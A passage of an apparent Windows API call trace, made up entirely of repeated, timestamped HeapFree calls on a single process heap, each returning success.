hHeap=0x5d0000) returned 1 [0063.322] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4361030 | out: hHeap=0x5d0000) returned 1 [0063.324] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4361030 | out: hHeap=0x5d0000) returned 1 [0063.331] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4361030 | out: hHeap=0x5d0000) returned 1 [0063.332] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4361030 | out: hHeap=0x5d0000) returned 1 [0063.334] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4361030 | out: hHeap=0x5d0000) returned 1 [0063.337] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4361030 | out: hHeap=0x5d0000) returned 1 [0063.339] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4361030 | out: hHeap=0x5d0000) returned 1 [0063.341] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4361030 | out: hHeap=0x5d0000) returned 1 [0063.342] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4361030 | out: hHeap=0x5d0000) returned 1 [0063.345] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4361030 | out: hHeap=0x5d0000) returned 1 [0063.346] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4361030 | out: hHeap=0x5d0000) returned 1 [0063.347] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4361030 | out: hHeap=0x5d0000) returned 1 [0063.857] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4361030 | out: hHeap=0x5d0000) returned 1 [0063.972] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4361030 | out: hHeap=0x5d0000) returned 1 [0063.973] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4361030 | out: hHeap=0x5d0000) returned 1 [0063.975] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4361030 | out: hHeap=0x5d0000) returned 1 [0063.976] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4361030 | out: hHeap=0x5d0000) returned 1 [0063.985] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4361030 | out: hHeap=0x5d0000) returned 1 [0064.021] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4361030 | out: hHeap=0x5d0000) returned 1 [0064.022] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4361030 | out: hHeap=0x5d0000) returned 1 [0064.023] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4361030 | out: hHeap=0x5d0000) returned 1 [0064.028] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4361030 | out: hHeap=0x5d0000) returned 1 [0064.030] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4361030 | out: hHeap=0x5d0000) returned 1 [0064.042] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4361030 | out: hHeap=0x5d0000) returned 1 [0064.043] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4361030 | out: hHeap=0x5d0000) returned 1 [0064.045] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4361030 | out: hHeap=0x5d0000) returned 1 [0064.047] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4361030 | out: hHeap=0x5d0000) returned 1 [0064.048] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4361030 | out: hHeap=0x5d0000) returned 1 [0064.050] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4361030 | out: hHeap=0x5d0000) returned 1 [0064.085] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4361030 | out: hHeap=0x5d0000) returned 1 [0064.086] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4361030 | out: hHeap=0x5d0000) returned 1 [0064.088] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4361030 | out: hHeap=0x5d0000) returned 1 [0064.089] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4361030 | out: hHeap=0x5d0000) returned 1 [0064.089] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4351028 | out: hHeap=0x5d0000) returned 1 [0064.089] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4321010 | out: hHeap=0x5d0000) returned 1 [0064.092] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4321010 | out: hHeap=0x5d0000) returned 1 [0064.094] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4351028 | out: hHeap=0x5d0000) returned 1 [0064.758] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4351028 | out: hHeap=0x5d0000) returned 1 [0064.761] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0064.763] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0064.773] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0064.774] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0064.776] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0064.782] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0064.784] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0064.786] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0064.787] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0064.789] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0064.791] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0064.793] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0064.794] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0064.796] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0064.798] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0064.800] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0065.246] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0065.249] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0065.251] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0065.253] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0065.256] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0065.258] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0065.260] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0065.262] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0065.265] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0065.267] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0065.277] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0065.293] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0065.294] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0065.295] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0065.297] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0065.299] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0065.300] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0065.678] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0065.681] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0065.684] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0065.687] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0065.691] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0065.694] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0065.696] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0065.700] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0065.702] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0065.702] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4321010 | out: hHeap=0x5d0000) returned 1 [0065.705] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42f1010 | out: hHeap=0x5d0000) returned 1 [0065.708] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42f1010 | out: hHeap=0x5d0000) returned 1 [0065.710] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42f1010 | out: hHeap=0x5d0000) returned 1 [0065.713] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42f1010 | out: hHeap=0x5d0000) returned 1 [0065.716] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42f1010 | out: hHeap=0x5d0000) returned 1 [0066.088] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42f1010 | out: hHeap=0x5d0000) returned 1 [0066.092] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42f1010 | out: hHeap=0x5d0000) returned 1 [0066.094] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42f1010 | out: hHeap=0x5d0000) returned 1 [0066.096] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42f1010 | out: hHeap=0x5d0000) returned 1 [0066.100] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42f1010 | out: hHeap=0x5d0000) returned 1 [0066.102] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42f1010 | out: hHeap=0x5d0000) returned 1 [0066.105] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42f1010 | out: hHeap=0x5d0000) returned 1 [0066.108] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42f1010 | out: hHeap=0x5d0000) returned 1 [0066.111] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42f1010 | out: hHeap=0x5d0000) returned 1 [0066.113] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42f1010 | out: hHeap=0x5d0000) returned 1 [0066.116] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42f1010 | out: hHeap=0x5d0000) returned 1 [0066.119] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42f1010 | out: hHeap=0x5d0000) returned 1 [0066.122] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42f1010 | out: hHeap=0x5d0000) returned 1 [0066.726] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42f1010 | out: hHeap=0x5d0000) returned 1 [0066.728] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42f1010 | out: hHeap=0x5d0000) returned 1 [0066.730] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42f1010 | out: hHeap=0x5d0000) returned 1 [0066.732] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42f1010 | out: hHeap=0x5d0000) returned 1 [0066.734] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42f1010 | out: hHeap=0x5d0000) returned 1 [0066.735] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42f1010 | out: hHeap=0x5d0000) returned 1 [0066.737] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42f1010 | out: hHeap=0x5d0000) returned 1 [0066.739] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42f1010 | out: hHeap=0x5d0000) returned 1 [0066.742] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42f1010 | out: hHeap=0x5d0000) returned 1 [0066.743] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42f1010 | out: hHeap=0x5d0000) returned 1 [0066.745] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42f1010 | out: hHeap=0x5d0000) returned 1 [0066.747] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42f1010 | out: hHeap=0x5d0000) returned 1 [0066.749] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42f1010 | out: hHeap=0x5d0000) returned 1 [0067.194] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42f1010 | out: hHeap=0x5d0000) returned 1 [0067.194] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0067.194] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0067.194] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0067.194] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0067.195] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0067.195] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0067.195] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0067.195] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0067.195] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0067.195] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0067.195] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0067.195] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0067.195] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0067.196] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0067.196] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0067.196] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0067.196] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0067.196] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0067.196] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0067.196] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0067.196] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0067.197] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0067.197] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0067.197] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0067.197] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0067.197] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0067.204] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0067.204] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0067.204] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0067.204] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0067.204] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0067.204] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0067.204] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0067.205] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0067.205] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0067.205] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0067.205] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0067.205] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0067.205] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0067.205] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0067.205] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0067.206] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0067.206] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0067.206] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0067.206] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4301018 | out: hHeap=0x5d0000) returned 1 [0067.206] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42f1010 | out: hHeap=0x5d0000) returned 1 [0067.208] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42f1010 | out: hHeap=0x5d0000) returned 1 [0067.209] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42f1010 | out: hHeap=0x5d0000) returned 1 [0067.928] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42f1010 | out: hHeap=0x5d0000) returned 1 [0067.931] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43c4e68 | out: hHeap=0x5d0000) returned 1 [0067.934] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43c4e68 | out: hHeap=0x5d0000) returned 1 [0067.941] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43c4e68 | out: hHeap=0x5d0000) returned 1 [0067.943] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43c4e68 | out: hHeap=0x5d0000) returned 1 [0067.946] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43c4e68 | out: hHeap=0x5d0000) returned 1 [0067.948] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43c4e68 | out: hHeap=0x5d0000) returned 1 [0067.950] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43c4e68 | out: hHeap=0x5d0000) returned 1 [0067.953] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43c4e68 | out: hHeap=0x5d0000) returned 1 [0067.956] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43c4e68 | out: hHeap=0x5d0000) returned 1 [0067.958] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43c4e68 | out: hHeap=0x5d0000) returned 1 [0067.960] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43c4e68 | out: hHeap=0x5d0000) returned 1 [0067.961] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0067.964] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42a1080 | out: hHeap=0x5d0000) returned 1 [0068.920] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0068.922] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0068.922] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42a1080 | out: hHeap=0x5d0000) returned 1 [0068.926] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42a1080 | out: hHeap=0x5d0000) returned 1 [0068.928] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42a1080 | out: hHeap=0x5d0000) returned 1 [0068.931] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0068.931] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42a1080 | out: hHeap=0x5d0000) returned 1 [0068.933] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43c4e68 | out: hHeap=0x5d0000) returned 1 [0068.933] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0068.933] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42a1080 | out: hHeap=0x5d0000) returned 1 [0068.940] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0068.940] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42a1080 | out: hHeap=0x5d0000) returned 1 [0068.940] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43d4e70 | out: hHeap=0x5d0000) returned 1 [0068.941] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43d4e70 | out: hHeap=0x5d0000) returned 1 [0068.941] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43d4e70 | out: hHeap=0x5d0000) returned 1 [0068.941] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43c4e68 | out: hHeap=0x5d0000) returned 1 [0068.942] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43d4e70 | out: hHeap=0x5d0000) returned 1 [0068.943] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43c4e68 | out: hHeap=0x5d0000) returned 1 [0068.943] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0068.947] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43c4e68 | out: hHeap=0x5d0000) returned 1 [0068.949] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43c4e68 | out: hHeap=0x5d0000) returned 1 [0069.587] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43c4e68 | out: hHeap=0x5d0000) returned 1 [0069.587] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0069.589] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0069.591] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43e4e78 | out: hHeap=0x5d0000) returned 1 [0069.591] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43e4e78 | out: hHeap=0x5d0000) returned 1 [0069.592] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43c4e68 | out: hHeap=0x5d0000) returned 1 [0069.592] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0069.594] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0069.595] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42a1080 | out: hHeap=0x5d0000) returned 1 [0069.599] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0069.599] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0069.599] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42a1080 | out: hHeap=0x5d0000) returned 1 [0069.610] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42a1080 | out: hHeap=0x5d0000) returned 1 [0069.615] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42a1080 | out: hHeap=0x5d0000) returned 1 [0069.878] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0069.878] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0069.878] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0069.878] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0069.878] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0069.879] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0069.879] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0069.879] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0069.879] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0069.879] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0069.879] HeapFree (in: hHeap=0x5d0000, 